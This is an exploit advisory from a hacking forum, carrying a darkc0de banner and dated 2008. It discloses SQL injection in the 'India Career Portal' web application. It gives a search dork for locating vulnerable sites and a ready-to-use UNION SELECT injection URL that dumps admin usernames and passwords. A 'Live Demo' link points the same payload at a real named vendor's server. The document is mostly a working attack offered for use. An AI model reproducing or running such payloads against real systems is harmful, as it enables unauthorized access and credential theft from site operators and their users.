################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4sc4l # #-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz # # and all darkc0de members ---# ################################################################ # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Email : beenudel1986@gmail.com # # Python Dark Codes : www.beenuarora.com/work.html # # Share the c0de! # ################################################################ # # Title: India Career Portal SQL Injection # # VEndor: http://www.indiacareerportal.com/ # # ########################################################### # # d0rk: "IndiaCareerPortal" # ########################################################### POC :- http://site.com/home.php?mod=news_view&id=453+and+1=2+union+select+1,2,concat(username,0x3a,password),version(),5,6,7+from+websiteadmin_admin_users-- Live Demo: http://dias.indiacareerportal.com/home.php?mod=news_view&id=453+and+1=2+union+select+1,2,concat(username,0x3a,password),version(),5,6,7+from+websiteadmin_admin_users-- ########################################################### # # Bug discovered : 24 Sep.2008 ###########################################################